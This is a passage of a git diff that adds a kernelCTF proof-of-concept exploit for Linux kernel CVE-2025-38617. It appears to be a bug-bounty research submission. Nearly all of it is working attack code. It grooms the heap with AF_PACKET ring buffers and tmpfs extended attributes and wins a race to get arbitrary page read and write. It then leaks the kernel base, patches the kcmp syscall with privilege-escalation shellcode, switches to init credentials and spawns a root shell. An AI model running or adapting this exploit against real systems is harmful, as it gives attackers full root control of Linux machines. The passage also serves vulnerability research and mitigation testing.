tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; + } + + filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(void *); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 38, // packet_reserve + filter // filter + ); +} + +void simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 256, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 128, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 128, PAGES_ORDER3_SIZE); +} + +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { + alloc_pages(primitive->spray_pg_vec_packet_sockets[i], MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + primitive->spray_pg_vec_packet_sockets_state[i] = 1; + } + + for (int i = 64, free_count = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets) && free_count < 6; i += 16, free_count++) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } +} + +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { + if (primitive->spray_pg_vec_packet_sockets_state[i] && primitive->spray_pg_vec_packet_sockets[i] != -1) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } + } +} + +void simple_xattr_read_write_primitive_main_work( + struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(u64 *)(packet_data) = simple_xattr_kernel_address; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + simple_xattr_read_write_primitive_setup_pg_vec(primitive); + pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +) +{ + simple_xattr_read_write_primitive_main_work( + simple_xattr_read_write_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + timer_interrupt_amplitude, + decrease_tpacket_rcv_thread_sleep_time, + pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address + ); + + bool overflow_success = false; + for (int i = 0; i < ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets) && !overflow_success; i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] == 0) + continue; + + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + void *mem = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i], + 0 + ); + + struct simple_xattr *simple_xattr = mem + 4 * PAGE_SIZE; + if (is_data_look_like_simple_xattr(simple_xattr, KMALLOC_8K_SIZE)) { + simple_xattr_dump(simple_xattr); + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket = simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] = 0; + simple_xattr_read_write_primitive->manipulated_simple_xattr_request = pages_order2_read_primitive->leaked_content_simple_xattr_request; + pages_order2_read_primitive->leaked_content_simple_xattr_request = NULL; + overflow_success = true; + } + + Munmap(mem, mmap_size); + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain_cleanup(simple_xattr_read_write_primitive); + simple_xattr_read_write_primitive_pg_vec_cleanup(simple_xattr_read_write_primitive); + + if (overflow_success) { + for (int i = 0; i < ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets); i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] != -1) { + Close(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]); + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + } + } + } + + return overflow_success; +} + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + simple_xattr_read_write_primitive->mmap_address = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket, + 0 + ); + + struct simple_xattr *simple_xattr = simple_xattr_read_write_primitive->mmap_address + 4 * PAGE_SIZE; + return simple_xattr; + +} + +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + Munmap(simple_xattr_read_write_primitive->mmap_address, mmap_size); + simple_xattr_read_write_primitive->mmap_address = NULL; +} + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + ssize_t getxattr_ret = 0; + u8 value_set[XATTR_SIZE_MAX] = {}; + u8 value_get[XATTR_SIZE_MAX] = {}; + struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + u64 original_manipulated_simple_xattr_name_pointer = (u64)(manipulated_simple_xattr->name); + u64 fake_simple_xattr_name_addr = 0; + u64 fake_simple_xattr_addr = 0; + int overwritten_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + bool abr_page_read_write_primitive_build_success = false; + + while (!abr_page_read_write_primitive_build_success) { + bool fake_simple_xattr_name_success = false; + int fake_simple_xattr_name_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_name_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME, + value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + if (manipulated_simple_xattr->rb_node.rb_right) + fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr->rb_node.rb_right; + else + fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr->rb_node.rb_left; + + fprintf(stderr, "fake_simple_xattr_name_addr: 0x%016lx\n", fake_simple_xattr_name_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_name_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + strcpy(mem, FAKE_SIMPLE_XATTR_NAME); + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (char *)(fake_simple_xattr_name_addr); + + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + fake_simple_xattr_name_success = true; + } + + manipulated_simple_xattr->name = (char *)original_manipulated_simple_xattr_name_pointer; + + if (!fake_simple_xattr_name_success) { + free_pages(fake_simple_xattr_name_packet_socket); + } + } + + fprintf(stderr, "fake_simple_xattr_name_success\n"); + + bool fake_simple_xattr_success = false; + int fake_simple_xattr_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME, + value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + bool is_right_node; + if (manipulated_simple_xattr->rb_node.rb_right) { + fake_simple_xattr_addr = (u64)manipulated_simple_xattr->rb_node.rb_right; + is_right_node = true; + } else { + fake_simple_xattr_addr = (u64)manipulated_simple_xattr->rb_node.rb_left; + is_right_node = false; + } + + fprintf(stderr, "fake_simple_xattr_addr: 0x%016lx\n", fake_simple_xattr_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + strcpy(mem, DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION); + + manipulated_simple_xattr->name = (void *)fake_simple_xattr_addr; + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + memset(mem, 0, 1 * PAGES_ORDER2_SIZE); + struct simple_xattr *fake_simple_xattr = mem; + fake_simple_xattr->rb_node.__rb_parent_color = pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address; + fake_simple_xattr->name = (char *)fake_simple_xattr_name_addr; + fake_simple_xattr->size = KMALLOC_8K_SIZE; + + if (is_right_node) { + manipulated_simple_xattr->rb_node.rb_right = (void *)fake_simple_xattr_addr; + } else { + manipulated_simple_xattr->rb_node.rb_left = (void *)fake_simple_xattr_addr; + } + + fake_simple_xattr_success = true; + } else { + free_pages(fake_simple_xattr_packet_socket); + } + + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (void *)original_manipulated_simple_xattr_name_pointer; + } + + fprintf(stderr, "fake_simple_xattr_success\n"); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME + ); + + alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + struct pgv *pgv = NULL; + + if (mem != MAP_FAILED && is_data_look_like_pgv(mem, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_name_packet_socket; + pgv = mem; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } else if (mem1 != MAP_FAILED && is_data_look_like_pgv(mem1, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_packet_socket; + pgv = mem1; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } + + if (mem != MAP_FAILED) + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + + if (mem1 != MAP_FAILED) + Munmap(mem1, 1 * PAGES_ORDER2_SIZE); + + if (abr_page_read_write_primitive_build_success) { + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec = overwritten_pg_vec_packet_socket; + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size = 1 * PAGES_ORDER2_SIZE; + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + } else { + free_pages(overwritten_pg_vec_packet_socket); + } + } + + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); +} + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = {}; + simple_xattr_read_write_primitive_init(&simple_xattr_read_write_primitive); + + struct timespec simple_xattr_read_write_primitive_sleep_decrease_amplitude = { .tv_nsec = 5000 }; + struct timespec simple_xattr_read_write_primitive_timer_interrupt_amplitude = { .tv_nsec = 167000 }; + + bool simple_xattr_read_write_primitive_build_success = false; + while (!simple_xattr_read_write_primitive_build_success) { + simple_xattr_read_write_primitive_build_success = simple_xattr_read_write_primitive_build_primitive( + &simple_xattr_read_write_primitive, + pages_order2_read_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + simple_xattr_read_write_primitive_sleep_decrease_amplitude, + simple_xattr_read_write_primitive_timer_interrupt_amplitude + ); + } + + return simple_xattr_read_write_primitive; +} + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +) +{ + if (page_aligned_addr_to_mmap & (PAGE_SIZE - 1)) { + fprintf(stderr, "[abr_page_read_write_primitive_mmap]: page_aligned_addr_to_mmap is not page aligned\n"); + return NULL; + } + + void *mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)page_aligned_addr_to_mmap; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); + + mem = mmap( + NULL, + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec, + 0 + ); + + if (mem == MAP_FAILED) + return NULL; + + return mem; +} + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +) +{ + Munmap(mem, abr_page_read_write_primitive->overwritten_pg_vec_mmap_size); + mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)abr_page_read_write_primitive->original_buffer_page_addr; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); +} + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive) +{ + u64 sys_kcmp_page = __do_sys_kcmp & PAGE_MASK; + u64 sys_kcmp_offset_from_page = __do_sys_kcmp - sys_kcmp_page; + + void *m = abr_page_read_write_primitive_mmap( + abr_page_read_write_primitive, + sys_kcmp_page + ); + + void *overwrite_ptr = m + sys_kcmp_offset_from_page; + void *shellcode = (void *)privilege_escalation_shellcode_begin; + int shellcode_length = (void *)privilege_escalation_shellcode_end - (void *)privilege_escalation_shellcode_begin; + void *saved_opcodes = Calloc(1, shellcode_length); + memcpy(saved_opcodes, overwrite_ptr, shellcode_length); + memcpy(overwrite_ptr, shellcode, shellcode_length); + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, m); + return saved_opcodes; +} + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + + u64 kernel_base = 0; + bool found_pipe_buffer = false; + + while (!found_pipe_buffer) { + int pipe_fd[2] = {}; + Pipe2(pipe_fd, O_DIRECT); + + u8 value[XATTR_SIZE_MAX] = {}; + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME, + value, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + u64 pipe_buffer_addr = 0; + if (manipulated_simple_xattr->rb_node.rb_right) + pipe_buffer_addr = (u64)manipulated_simple_xattr->rb_node.rb_right; + else + pipe_buffer_addr = (u64)manipulated_simple_xattr->rb_node.rb_left; + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME + ); + + Fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 * PAGE_SIZE); + Write(pipe_fd[1], DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN, strlen(DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN)); + + void *mem = abr_page_read_write_primitive_mmap(abr_page_read_write_primitive, pipe_buffer_addr); + if (mem != NULL) { + if (is_data_look_like_pipe_buffer(mem)) { + struct pipe_buffer *pipe_buffer = mem; + kernel_base = (u64)pipe_buffer->ops - anon_pipe_buf_ops_offset_from_kernel_base; + found_pipe_buffer = true; + } + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, mem); + } + + Close(pipe_fd[0]); + Close(pipe_fd[1]); + } + + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); + return kernel_base; +} + +int main(void) +{ + setup_nofile_rlimit(); + setup_namespace(); + setup_tmpfs(); + + int timerfd = Timerfd_create(CLOCK_MONOTONIC, 0); + struct necessary_threads *necessary_threads = necessary_threads_create(timerfd); + + dummy_network_interface_create(DUMMY_INTERFACE_NAME, IPV6_MIN_MTU - 1); + int configure_network_interface_socket = Socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + + struct pages_order2_read_primitive pages_order2_read_primitive = pages_order2_read_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd + ); + + fprintf(stderr, "pages_order2_read_primitive build success\n"); + + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = simple_xattr_read_write_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd, + &pages_order2_read_primitive + ); + + fprintf(stderr, "simple_xattr_read_write_primitive build success\n"); + + struct abr_page_read_write_primitive abr_page_read_write_primitive = {}; + abr_page_read_write_primitive_build_primitive( + &abr_page_read_write_primitive, + &simple_xattr_read_write_primitive, + &pages_order2_read_primitive + ); + + fprintf(stderr, "abr_page_read_write_primitive_build_primitive success\n"); + + u64 kernel_base = find_kernel_base(&abr_page_read_write_primitive, &simple_xattr_read_write_primitive); + fprintf(stderr, "[+] kernel base: 0x%016lx\n", kernel_base); + update_kernel_address(kernel_base); + void *sys_kcmp_saved_opcodes = patch_sys_kcmp(&abr_page_read_write_primitive); + + int not_used = -1; + syscall(SYS_kcmp, (u32)(init_cred >> 32), (u32)(init_cred), not_used, init_fs, __x86_return_thunk); + + char *sh_args[] = {"sh", NULL}; + execve("/bin/sh", sh_args, NULL); +} diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.h b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.h new file mode 100644 index 000000000..85af57e69 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.h @@ -0,0 +1,682 @@ +#ifndef EXPLOIT_H +#define EXPLOIT_H + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef int64_t s64; +typedef uint64_t u64; +typedef uint32_t u32; +typedef uint16_t u16; +typedef uint8_t u8; + +struct pgv { + char *buffer; +}; + +static_assert(sizeof(struct pgv) == 8, "sizeof(struct pgv) not match with kernel"); + +static inline bool is_data_look_like_pgv(struct pgv *pgv, size_t count) +{ + bool is_pgv = true; + + for (size_t i = 0; i < count && is_pgv; i++) { + u64 kernel_page_addr = (u64)(pgv[i].buffer); + if ((kernel_page_addr >> 48) != 0xFFFF) + is_pgv = false; + } + + return is_pgv; +} + +static inline void pgv_dump(struct pgv *pgv, size_t len) +{ + for (size_t i = 0; i < len; i++) { + printf("pgv[%zu] = 0x%016lx\n", i, (u64)(pgv[i].buffer)); + } +} + +struct rb_node { + unsigned long __rb_parent_color; + struct rb_node *rb_right; + struct rb_node *rb_left; +} __attribute__((aligned(sizeof(long)))); + +static_assert(sizeof(struct rb_node) == 24, "sizeof(struct rb_node) not match with kernel"); + +struct simple_xattr { + struct rb_node rb_node; + char *name; + size_t size; + char value[]; +}; + +static_assert(sizeof(struct simple_xattr) == 40, "sizeof(struct simple_xattr) not match with kernel"); + +#define UNUSED_FUNCTION_PARAMETER(x) (void)(x) +#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0])) + +#define KMALLOC_8K_SIZE 8192 +#define KMALLOC_8_SIZE 8 +#define PAGE_SIZE 4096UL +#define PAGE_MASK (~(PAGE_SIZE - 1)) +#define PAGES_ORDER1_SIZE (PAGE_SIZE * 2) +#define PAGES_ORDER2_SIZE (PAGE_SIZE * 4) +#define PAGES_ORDER3_SIZE (PAGE_SIZE * 8) +#define PAGES_ORDER4_SIZE (PAGE_SIZE * 16) +#define PAGES_ORDER5_SIZE (PAGE_SIZE * 32) +#define CPU_NUMBER_ZERO 0 +#define CPU_NUMBER_ONE 1 +#define NSEC_PER_SEC 1000000000L +#define NSEC_PER_USEC 1000L +#define USEC_PER_SEC 1000000L +#define TOTAL_TIMERFD_WAITLIST_THREADS 180 + +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 ((KMALLOC_8K_SIZE / sizeof(struct pgv)) + 1) +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16 ((KMALLOC_8_SIZE / sizeof(struct pgv)) + 1) + +#define PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 256 +#define DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN "fillin_pipe_buffer" + +#define MAX_FILTER_LEN 700 +#define MAX_NICE 19 + +#define TMPFS_MOUNT_POINT "/tmp/tmpfs" +#define DUMMY_INTERFACE_NAME "pwn_dummy" + +#define __rb_parent(pc) ((struct rb_node *)(pc & ~3)) + +u64 anon_pipe_buf_ops_last_24_bits = 0xc4a600; +u64 anon_pipe_buf_ops_offset_from_kernel_base = 0x1c4a600; +u64 struct_task_struct_member_cred_offset = 0x7c0; +u64 struct_task_struct_member_real_cred_offset = 0x7b8; +u64 init_cred = 0x2c72ec0; +u64 init_fs = 0x2dad900; +u64 __x86_return_thunk = 0x14855d0; +u64 __do_sys_kcmp = 0x273d70; + +static inline void update_kernel_address(u64 kernel_base) +{ + init_cred += kernel_base; + init_fs += kernel_base; + __x86_return_thunk += kernel_base; + __do_sys_kcmp += kernel_base; +} + +static inline bool is_data_look_like_simple_xattr(void *data, size_t value_size) +{ + struct simple_xattr *simple_xattr = data; + struct rb_node rb_node = simple_xattr->rb_node; + struct rb_node *rb_parent = __rb_parent(rb_node.__rb_parent_color); + + if ( + (rb_parent == NULL || (((u64)(rb_parent)) >> 48) == 0xFFFF) && + (rb_node.rb_left == NULL || (((u64)(rb_node.rb_left)) >> 48) == 0xFFFF) && + (rb_node.rb_right == NULL || (((u64)(rb_node.rb_right)) >> 48) == 0xFFFF) && + (((u64)(simple_xattr->name) >> 48) == 0xFFFF) && + (simple_xattr->size == value_size) + ) + return true; + + return false; +} + +static inline void simple_xattr_dump(struct simple_xattr *simple_xattr) +{ + struct rb_node *rb_node = &(simple_xattr->rb_node); + printf("====== simple_xattr_dump ======\n"); + printf("rb_parent: 